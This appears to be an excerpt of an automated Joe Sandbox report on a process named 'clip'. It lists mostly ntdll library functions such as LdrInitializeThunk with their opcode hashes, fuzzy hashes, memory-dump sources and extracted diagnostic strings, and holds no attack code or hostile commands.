                    • Opcode ID: 4223404c5d768b60aa07b7444f8512756bbb82e5bb1f81b4c014ceb2b93bc45b
                    • Instruction ID: 043d24ac4e9a789a5320714b934c9d8428611f8d3230bed6f6c6818214db2bfa
                    • Opcode Fuzzy Hash: 4223404c5d768b60aa07b7444f8512756bbb82e5bb1f81b4c014ceb2b93bc45b
                    • Instruction Fuzzy Hash: 0290023124140403F5007598540864610058BF1345F55D013A5025556EC769D9916131
                    Function 04402D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 271 4402d10-4402d1c LdrInitializeThunk
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 3ad9b7d946fe28357cb42fee375cf8853ba05b274a0bb9b9feee75f4bf25c3ed
                    • Instruction ID: 3216f713d8116c45f3c5ebcb2a178deb94fb5ec2d86c0e98551ec1232c5db261
                    • Opcode Fuzzy Hash: 3ad9b7d946fe28357cb42fee375cf8853ba05b274a0bb9b9feee75f4bf25c3ed
                    • Instruction Fuzzy Hash: A990023925340003F5807158540860A10058BE2246F95D417A0016559CCB19D9695321
                    Function 04402D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 272 4402d30-4402d3c LdrInitializeThunk
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 1b02840482ee2782fc5607d69299a8b3c783afbeffca4a3ed6d4971312d810fb
                    • Instruction ID: 8ba2c1957b02a42ec97f3f5278310ed0f24930d302490c279cc5a4112c5ca675
                    • Opcode Fuzzy Hash: 1b02840482ee2782fc5607d69299a8b3c783afbeffca4a3ed6d4971312d810fb
                    • Instruction Fuzzy Hash: B090023134140003F540715854186065005DBF2345F55D013E0415555CDB19D9565222
                    Function 04402DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: b3fca2a3fa502113b624b1fa250573c2f37e26767623612e88a013176a419973
                    • Instruction ID: c069d8141719cdbd5e3f17e9d1875836d0f5bbfe92de225e60f7d4ac5faeb4d6
                    • Opcode Fuzzy Hash: b3fca2a3fa502113b624b1fa250573c2f37e26767623612e88a013176a419973
                    • Instruction Fuzzy Hash: D3900231282441537945B158440450750069BF1285795C013A1415951C872AE956D621
                    Function 04402DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 0f47a6f9f7a4b96a5bfaa49f12541256607b177093adc0799d121a570871a7d6
                    • Instruction ID: d0eb613351f20e02da8d8e2b19c6a3a1f0fcc3df012b9146b8c12c87000b4d3d
                    • Opcode Fuzzy Hash: 0f47a6f9f7a4b96a5bfaa49f12541256607b177093adc0799d121a570871a7d6
                    • Instruction Fuzzy Hash: 6790023124140413F5117158450470710098BE1285F95C413A0425559D975ADA52A121
                    Function 04402EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: d054f683d7a2ac910676475ad67fc11b8d5801092a4a07b3b1bbc9cc2eae3b36
                    • Instruction ID: 06cce15b90b6ffedb4743f41592822b8a3c860790b8cbb79648b0a96a1e36015
                    • Opcode Fuzzy Hash: d054f683d7a2ac910676475ad67fc11b8d5801092a4a07b3b1bbc9cc2eae3b36
                    • Instruction Fuzzy Hash: 4590027124180403F5407558480460710058BE1346F55C013A2065556E8B2DDD516135
                    Function 04402E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: c3091d9b7853852b0e94e70ab8af9cb4e45089f0c85898068da26a6412e23573
                    • Instruction ID: 96418df98a581ffc3cee659a0850daeca0263319e85e7eeac015290340895a02
                    • Opcode Fuzzy Hash: c3091d9b7853852b0e94e70ab8af9cb4e45089f0c85898068da26a6412e23573
                    • Instruction Fuzzy Hash: 0190023164140503F50171584404616100A8BE1285F95C023A1025556ECB29DA92A131
                    Function 04402F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: c4375c847d899e4d3ba0830c295e3253a1c85219c9df9ebfb76c626ff34f847f
                    • Instruction ID: a7ce2791f5072b5cd1476b0016aa07a178e037f88c9b910e4ec52f56fbe405d5
                    • Opcode Fuzzy Hash: c4375c847d899e4d3ba0830c295e3253a1c85219c9df9ebfb76c626ff34f847f
                    • Instruction Fuzzy Hash: 6190027138140443F50071584414B061005CBF2345F55C017E1065555D871DDD526126
                    Function 04402FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: cab31306b175e6fa485d1276c051e219e1eed192356d282519e88ba5d8fd0bc7
                    • Instruction ID: e9c6dd638d6c53178b32ce13802941adcd35ced40e9883255bb41b140558c27d
                    • Opcode Fuzzy Hash: cab31306b175e6fa485d1276c051e219e1eed192356d282519e88ba5d8fd0bc7
                    • Instruction Fuzzy Hash: 57900231251C0043F60075684C14B0710058BE1347F55C117A0155555CCB19D9615521
                    Function 04402FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: ccdb1fae37b99b1dd1d871ecbdefffa1be8ef56b76e2f172a83cc325792ac571
                    • Instruction ID: f94e0f1393c7a6f3158c2e12b20ac0e7a64da0db0b5f0051dafc69c749f849d7
                    • Opcode Fuzzy Hash: ccdb1fae37b99b1dd1d871ecbdefffa1be8ef56b76e2f172a83cc325792ac571
                    • Instruction Fuzzy Hash: B3900231641400436540716888449065005AFF2255755C123A0999551D875DD9655665
                    Function 044039B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 17ee63bfa03f7ced375569f7e5ec1fca03055bab94a2ae45d05b1d01ff9b8d98
                    • Instruction ID: 74ec8df5a3dd1fcaf1282c729c2c4aa67fbe7bfa9046e37e96afcc757796e42d
                    • Opcode Fuzzy Hash: 17ee63bfa03f7ced375569f7e5ec1fca03055bab94a2ae45d05b1d01ff9b8d98
                    • Instruction Fuzzy Hash: 3890023128545103F550715C44046165005ABF1245F55C023A0815595D8759D9556221
                    Function 04402AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 262 4402ad0-4402adc LdrInitializeThunk
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 544c3a42bbf32a86203e742701dfca7b9c98d814644aa045338d061842b8f966
                    • Instruction ID: 45d4803ea27f9e9fc69f8cc98015b39b32156d72899a6fee84c138ce3def998f
                    • Opcode Fuzzy Hash: 544c3a42bbf32a86203e742701dfca7b9c98d814644aa045338d061842b8f966
                    • Instruction Fuzzy Hash: B2900235251400032505B558070450710468BE6395355C023F1016551CD725D9615121
                    Function 04402AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 263 4402af0-4402afc LdrInitializeThunk
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 51d45f832286f8e095c2f6e5376e30e3eab39f6f01067da955879c4206e53c71
                    • Instruction ID: 6016b1be4c497fbb163163c27bdc76704d65f7bfd1b80c54a99ffdaa6ab6a2a0
                    • Opcode Fuzzy Hash: 51d45f832286f8e095c2f6e5376e30e3eab39f6f01067da955879c4206e53c71
                    • Instruction Fuzzy Hash: 42900235261400032545B558060450B14459BE7395395C017F1417591CC725D9655321
                    Function 04402B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 264 4402b60-4402b6c LdrInitializeThunk
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: c02f8539718beaf7ece95b70b3de127e0b122cac66f10e6355646be5645ab6ea
                    • Instruction ID: 033e49b9fc2072f357d6ee9acc9703349b02175f8689ee2f111514ea9acf2af0
                    • Opcode Fuzzy Hash: c02f8539718beaf7ece95b70b3de127e0b122cac66f10e6355646be5645ab6ea
                    • Instruction Fuzzy Hash: 9890027124240003650571584414616500A8BF1245B55C023E1015591DC729D9916125
                    Function 04402BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 266 4402be0-4402bec LdrInitializeThunk
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: b19adb1f47b92d8eb90145379a0e2e3fd3f286f2afff22ca2f423717fc455ade
                    • Instruction ID: 26a5a4ad8bb5fe3508f06dd5eeeafcb38424b4ceed5083c1df024316c28df16e
                    • Opcode Fuzzy Hash: b19adb1f47b92d8eb90145379a0e2e3fd3f286f2afff22ca2f423717fc455ade
                    • Instruction Fuzzy Hash: 3390023124544843F54071584404A4610158BE1349F55C013A0065695D9729DE55B661
                    Function 04402BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 267 4402bf0-4402bfc LdrInitializeThunk
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 2d9f307fda93681d489ac2113d0f676b33f8e99212f6b0e084b4e983c5db3104
                    • Instruction ID: 9cd5a66be87b63c7460cb47cf77a0023b76848916fb6150cde3652bcf8b258de
                    • Opcode Fuzzy Hash: 2d9f307fda93681d489ac2113d0f676b33f8e99212f6b0e084b4e983c5db3104
                    • Instruction Fuzzy Hash: 8490023124140803F5807158440464A10058BE2345F95C017A0026655DCB19DB5977A1
                    Function 04402BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 265 4402ba0-4402bac LdrInitializeThunk
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 6cc5a318911c25a761f34e8c01a813056a84725f507e33ce2a6392f9c412e00d
                    • Instruction ID: c3c1f6a1a8d89e79b37cfb27cdcf87b8bd5458722645503bf1217adbda9b17ab
                    • Opcode Fuzzy Hash: 6cc5a318911c25a761f34e8c01a813056a84725f507e33ce2a6392f9c412e00d
                    • Instruction Fuzzy Hash: DA90023164540803F5507158441474610058BE1345F55C013A0025655D8759DB5576A1
                    Function 04402C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 258 4402c0a-4402c0f 259 4402c11-4402c18 258->259 260 4402c1f-4402c26 LdrInitializeThunk 258->260
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 5e7a66fbb8771340e26aaad6abe52e59d1bd3d0f9bb281a43b7e24c962b409fb
                    • Instruction ID: c9737708b04c1c3a8971e176160091085744c0d39d089017a58a1dc70894942a
                    • Opcode Fuzzy Hash: 5e7a66fbb8771340e26aaad6abe52e59d1bd3d0f9bb281a43b7e24c962b409fb
                    • Instruction Fuzzy Hash: 6CB04C719455C586EE11A760460861779006BD1745F15C067D2021696A4778D591E175

                    Non-executed Functions

                    Function 0410053E Relevance: .1, Instructions: 146COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034491190.0000000004100000.00000040.00000800.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4100000_clip.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 454349fe2e49458375ebc8e0eb49beec4e9819b54ccd1134fa378508492dde88
                    • Instruction ID: 9cc19a1ed7fa12b5e79d930076b5ce8abd660a30fecd9788fd53b9082373bd9c
                    • Opcode Fuzzy Hash: 454349fe2e49458375ebc8e0eb49beec4e9819b54ccd1134fa378508492dde88
                    • Instruction Fuzzy Hash: 7941F630618B094FD368AF68A0C1776B7E2FB89304F50852DD886D3292EBB0F8428785
                    Function 04402890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: ___swprintf_l
                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                    • API String ID: 48624451-2108815105
                    • Opcode ID: 2ff9ed5b0d75a590afdcf7e1c53947cfd22601529c248278a2e1c229565ff54c
                    • Instruction ID: 551c53fbad9239f17329e4cc921e3cba2a2802547ea12119ba0d587d1af20b38
                    • Opcode Fuzzy Hash: 2ff9ed5b0d75a590afdcf7e1c53947cfd22601529c248278a2e1c229565ff54c
                    • Instruction Fuzzy Hash: 3951D6B6B00516BFDF21DF58988497EF7B8BB08205714C26BE495D76C1E274FE508BA0
                    Function 043F7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                    Download Yara Rule
                    Strings
                    • ExecuteOptions, xrefs: 044346A0
                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04434725
                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04434742
                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 044346FC
                    • Execute=1, xrefs: 04434713
                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04434655
                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 04434787
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID:
                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                    • API String ID: 0-484625025
                    • Opcode ID: f2feccbf8aca79164aa525c5c3b52cc14017cd16e74391958ddd8a43107d2ea2
                    • Instruction ID: cd5eadc1723a65e3294ab13deed2b5d45523249607fec8804486b417599b3d30
                    • Opcode Fuzzy Hash: f2feccbf8aca79164aa525c5c3b52cc14017cd16e74391958ddd8a43107d2ea2
                    • Instruction Fuzzy Hash: 6051F6316402196BFF20ABA5EC85FBA77A8EF08705F0410AAE605A71D1EB71BE558F50
                    Function 0440B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: __aulldvrm
                    • String ID: +$-$0$0
                    • API String ID: 1302938615-699404926
                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                    • Instruction ID: 06ba6b7d771176aeff426dee150748270250d1c3170daa9029e9b62fe86b45f3
                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                    • Instruction Fuzzy Hash: 5581B230E052898ADF288EE8C8507BE7BB1EF85310F18C97BD851A73D1C634B8618B59
                    Function 043EF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                    Download Yara Rule
                    Strings
                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 044302BD
                    • RTL: Re-Waiting, xrefs: 0443031E
                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 044302E7
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID:
                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                    • API String ID: 0-2474120054
                    • Opcode ID: fecf9231c32ea4ad6f4df6e0f101a97cbae8093df28615b26e4c70f195eac9bf
                    • Instruction ID: bc633ea66c63bbe7667352390485bde01a10191530fbd58ac6e13b21f3132258
                    • Opcode Fuzzy Hash: fecf9231c32ea4ad6f4df6e0f101a97cbae8093df28615b26e4c70f195eac9bf
